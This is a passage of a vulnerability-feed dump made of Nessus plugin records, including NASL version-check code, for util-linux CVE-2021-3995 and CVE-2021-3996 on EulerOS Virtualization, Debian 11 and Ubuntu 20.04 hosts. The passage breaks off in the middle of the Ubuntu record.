{"lastseen": "2023-11-01T15:23:00", "description": "According to the versions of the util-linux packages installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities :\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable directory. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. (CVE-2021-3996)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker in its string form. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. (CVE-2021-3995)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2022-05-05T00:00:00", "type": "nessus", "title": "EulerOS Virtualization 2.9.1 : util-linux (EulerOS-SA-2022-1616)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996"], "modified": "2023-10-31T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:libblkid", "p-cpe:/a:huawei:euleros:libfdisk", "p-cpe:/a:huawei:euleros:libmount", "p-cpe:/a:huawei:euleros:libsmartcols", "p-cpe:/a:huawei:euleros:libuuid", "p-cpe:/a:huawei:euleros:util-linux", "p-cpe:/a:huawei:euleros:util-linux-user", "cpe:/o:huawei:euleros:uvp:2.9.1"], "id": "EULEROS_SA-2022-1616.NASL", "href": "https://www.tenable.com/plugins/nessus/160587", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(160587);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/31\");\n\n script_cve_id(\"CVE-2021-3995\", \"CVE-2021-3996\");\n\n script_name(english:\"EulerOS Virtualization 2.9.1 : util-linux (EulerOS-SA-2022-1616)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the util-linux packages installed, the EulerOS Virtualization installation on the remote\nhost is affected by the following vulnerabilities :\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other\n users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable\n directory. An attacker may use this flaw to cause a denial of service to applications that use the\n affected filesystems. (CVE-2021-3996)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE\n filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker\n in its string form. An attacker may use this flaw to cause a denial of service to applications that use\n the affected filesystems. (CVE-2021-3995)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security\nadvisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional\nissues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2022-1616\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?bfe8cf37\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected util-linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:S/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3996\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/05/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/05/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/05/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libblkid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libfdisk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libmount\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libsmartcols\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libuuid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:util-linux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:util-linux-user\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:2.9.1\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nvar uvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"2.9.1\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 2.9.1\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nvar flag = 0;\n\nvar pkgs = [\n \"libblkid-2.35.1-1.h24.eulerosv2r9\",\n \"libfdisk-2.35.1-1.h24.eulerosv2r9\",\n \"libmount-2.35.1-1.h24.eulerosv2r9\",\n \"libsmartcols-2.35.1-1.h24.eulerosv2r9\",\n \"libuuid-2.35.1-1.h24.eulerosv2r9\",\n \"util-linux-2.35.1-1.h24.eulerosv2r9\",\n \"util-linux-user-2.35.1-1.h24.eulerosv2r9\"\n];\n\nforeach (var pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"util-linux\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-01T15:24:18", "description": "According to the versions of the util-linux packages installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities :\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable directory. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. (CVE-2021-3996)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker in its string form. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. (CVE-2021-3995)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2022-05-05T00:00:00", "type": "nessus", "title": "EulerOS Virtualization 2.9.0 : util-linux (EulerOS-SA-2022-1640)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996"], "modified": "2023-10-30T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:libblkid", "p-cpe:/a:huawei:euleros:libfdisk", "p-cpe:/a:huawei:euleros:libmount", "p-cpe:/a:huawei:euleros:libsmartcols", "p-cpe:/a:huawei:euleros:libuuid", "p-cpe:/a:huawei:euleros:util-linux", "p-cpe:/a:huawei:euleros:util-linux-user", "cpe:/o:huawei:euleros:uvp:2.9.0"], "id": "EULEROS_SA-2022-1640.NASL", "href": "https://www.tenable.com/plugins/nessus/160591", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(160591);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/30\");\n\n script_cve_id(\"CVE-2021-3995\", \"CVE-2021-3996\");\n\n script_name(english:\"EulerOS Virtualization 2.9.0 : util-linux (EulerOS-SA-2022-1640)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the util-linux packages installed, the EulerOS Virtualization installation on the remote\nhost is affected by the following vulnerabilities :\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other\n users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable\n directory. An attacker may use this flaw to cause a denial of service to applications that use the\n affected filesystems. (CVE-2021-3996)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE\n filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker\n in its string form. An attacker may use this flaw to cause a denial of service to applications that use\n the affected filesystems. (CVE-2021-3995)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security\nadvisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional\nissues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2022-1640\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2f588c82\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected util-linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:S/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3996\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/05/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/05/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/05/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libblkid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libfdisk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libmount\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libsmartcols\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libuuid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:util-linux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:util-linux-user\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:2.9.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nvar uvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"2.9.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 2.9.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nvar flag = 0;\n\nvar pkgs = [\n \"libblkid-2.35.1-1.h24.eulerosv2r9\",\n \"libfdisk-2.35.1-1.h24.eulerosv2r9\",\n \"libmount-2.35.1-1.h24.eulerosv2r9\",\n \"libsmartcols-2.35.1-1.h24.eulerosv2r9\",\n \"libuuid-2.35.1-1.h24.eulerosv2r9\",\n \"util-linux-2.35.1-1.h24.eulerosv2r9\",\n \"util-linux-user-2.35.1-1.h24.eulerosv2r9\"\n];\n\nforeach (var pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"util-linux\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-19T14:39:46", "description": "The remote Debian 11 host has packages installed that are affected by multiple vulnerabilities as referenced in the dsa-5055 advisory.\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable directory. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. (CVE-2021-3996)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker in its string form. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. (CVE-2021-3995)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-01-31T00:00:00", "type": "nessus", "title": "Debian DSA-5055-1 : util-linux - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996"], "modified": "2023-11-17T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:bsdextrautils", "p-cpe:/a:debian:debian_linux:bsdutils", "p-cpe:/a:debian:debian_linux:eject", "p-cpe:/a:debian:debian_linux:eject-udeb", "p-cpe:/a:debian:debian_linux:fdisk", "p-cpe:/a:debian:debian_linux:fdisk-udeb", "p-cpe:/a:debian:debian_linux:libblkid-dev", "p-cpe:/a:debian:debian_linux:libblkid1", "p-cpe:/a:debian:debian_linux:libblkid1-udeb", "p-cpe:/a:debian:debian_linux:libfdisk-dev", "p-cpe:/a:debian:debian_linux:libfdisk1", "p-cpe:/a:debian:debian_linux:libfdisk1-udeb", "p-cpe:/a:debian:debian_linux:libmount-dev", "p-cpe:/a:debian:debian_linux:libmount1", "p-cpe:/a:debian:debian_linux:libmount1-udeb", "p-cpe:/a:debian:debian_linux:libsmartcols-dev", "p-cpe:/a:debian:debian_linux:libsmartcols1", "p-cpe:/a:debian:debian_linux:libsmartcols1-udeb", "p-cpe:/a:debian:debian_linux:libuuid1", "p-cpe:/a:debian:debian_linux:libuuid1-udeb", "p-cpe:/a:debian:debian_linux:mount", "p-cpe:/a:debian:debian_linux:rfkill", "p-cpe:/a:debian:debian_linux:util-linux", "p-cpe:/a:debian:debian_linux:util-linux-locales", "p-cpe:/a:debian:debian_linux:util-linux-udeb", "p-cpe:/a:debian:debian_linux:uuid-dev", "p-cpe:/a:debian:debian_linux:uuid-runtime", "cpe:/o:debian:debian_linux:11.0"], "id": "DEBIAN_DSA-5055.NASL", "href": "https://www.tenable.com/plugins/nessus/157263", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory dsa-5055. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(157263);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/11/17\");\n\n script_cve_id(\"CVE-2021-3995\", \"CVE-2021-3996\");\n\n script_name(english:\"Debian DSA-5055-1 : util-linux - security update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing one or more security-related updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Debian 11 host has packages installed that are affected by multiple vulnerabilities as referenced in the\ndsa-5055 advisory.\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other\n users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable\n directory. An attacker may use this flaw to cause a denial of service to applications that use the\n affected filesystems. (CVE-2021-3996)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE\n filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker\n in its string form. An attacker may use this flaw to cause a denial of service to applications that use\n the affected filesystems. (CVE-2021-3995)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/source-package/util-linux\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.debian.org/security/2022/dsa-5055\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2021-3995\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2021-3996\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/bullseye/util-linux\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the util-linux packages.\n\nFor the stable distribution (bullseye), these problems have been fixed in version 2.36.1-8+deb11u1.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:S/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3996\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/01/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/01/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/01/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bsdextrautils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bsdutils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:eject\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:eject-udeb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:fdisk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:fdisk-udeb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libblkid-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libblkid1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libblkid1-udeb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libfdisk-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libfdisk1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libfdisk1-udeb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libmount-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libmount1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libmount1-udeb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libsmartcols-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libsmartcols1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libsmartcols1-udeb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libuuid1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libuuid1-udeb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:mount\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:rfkill\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:util-linux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:util-linux-locales\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:util-linux-udeb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:uuid-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:uuid-runtime\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:11.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Debian Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('debian_package.inc');\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar release = get_kb_item('Host/Debian/release');\nif ( isnull(release) ) audit(AUDIT_OS_NOT, 'Debian');\nvar release = chomp(release);\nif (! preg(pattern:\"^(11)\\.[0-9]+\", string:release)) audit(AUDIT_OS_NOT, 'Debian 11.0', 'Debian ' + release);\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Debian', cpu);\n\nvar pkgs = [\n {'release': '11.0', 'prefix': 'bsdextrautils', 'reference': '2.36.1-8+deb11u1'},\n {'release': '11.0', 'prefix': 'bsdutils', 'reference': '2.36.1-8+deb11u1'},\n {'release': '11.0', 'prefix': 'eject', 'reference': '2.36.1-8+deb11u1'},\n {'release': '11.0', 'prefix': 'eject-udeb', 'reference': '2.36.1-8+deb11u1'},\n {'release': '11.0', 'prefix': 'fdisk', 'reference': '2.36.1-8+deb11u1'},\n {'release': '11.0', 'prefix': 'fdisk-udeb', 'reference': '2.36.1-8+deb11u1'},\n {'release': '11.0', 'prefix': 'libblkid-dev', 'reference': '2.36.1-8+deb11u1'},\n {'release': '11.0', 'prefix': 'libblkid1', 'reference': '2.36.1-8+deb11u1'},\n {'release': '11.0', 'prefix': 'libblkid1-udeb', 'reference': '2.36.1-8+deb11u1'},\n {'release': '11.0', 'prefix': 'libfdisk-dev', 'reference': '2.36.1-8+deb11u1'},\n {'release': '11.0', 'prefix': 'libfdisk1', 'reference': '2.36.1-8+deb11u1'},\n {'release': '11.0', 'prefix': 'libfdisk1-udeb', 'reference': '2.36.1-8+deb11u1'},\n {'release': '11.0', 'prefix': 'libmount-dev', 'reference': '2.36.1-8+deb11u1'},\n {'release': '11.0', 'prefix': 'libmount1', 'reference': '2.36.1-8+deb11u1'},\n {'release': '11.0', 'prefix': 'libmount1-udeb', 'reference': '2.36.1-8+deb11u1'},\n {'release': '11.0', 'prefix': 'libsmartcols-dev', 'reference': '2.36.1-8+deb11u1'},\n {'release': '11.0', 'prefix': 'libsmartcols1', 'reference': '2.36.1-8+deb11u1'},\n {'release': '11.0', 'prefix': 'libsmartcols1-udeb', 'reference': '2.36.1-8+deb11u1'},\n {'release': '11.0', 'prefix': 'libuuid1', 'reference': '2.36.1-8+deb11u1'},\n {'release': '11.0', 'prefix': 'libuuid1-udeb', 'reference': '2.36.1-8+deb11u1'},\n {'release': '11.0', 'prefix': 'mount', 'reference': '2.36.1-8+deb11u1'},\n {'release': '11.0', 'prefix': 'rfkill', 'reference': '2.36.1-8+deb11u1'},\n {'release': '11.0', 'prefix': 'util-linux', 'reference': '2.36.1-8+deb11u1'},\n {'release': '11.0', 'prefix': 'util-linux-locales', 'reference': '2.36.1-8+deb11u1'},\n {'release': '11.0', 'prefix': 'util-linux-udeb', 'reference': '2.36.1-8+deb11u1'},\n {'release': '11.0', 'prefix': 'uuid-dev', 'reference': '2.36.1-8+deb11u1'},\n {'release': '11.0', 'prefix': 'uuid-runtime', 'reference': '2.36.1-8+deb11u1'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var release = NULL;\n var prefix = NULL;\n var reference = NULL;\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['prefix'])) prefix = package_array['prefix'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (release && prefix && reference) {\n if (deb_check(release:release, prefix:prefix, reference:reference)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : deb_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = deb_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'bsdextrautils / bsdutils / eject / eject-udeb / fdisk / fdisk-udeb / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-21T15:51:52", "description": "The remote Ubuntu 20.04 LTS host has packages installed that are affected by multiple vulnerabilities as referenced in the USN-5279-1 advisory.\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable directory. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. (CVE-2021-3996)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker in its string form. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. (CVE-2021-3995)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-02-09T00:00:00", "type": "nessus", "title": "Ubuntu 20.04 LTS : util-linux vulnerabilities (USN-5279-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996"], "modified": "2023-10-20T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:20.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:bsdutils", "p-cpe:/a:canonical:ubuntu_linux:fdisk", 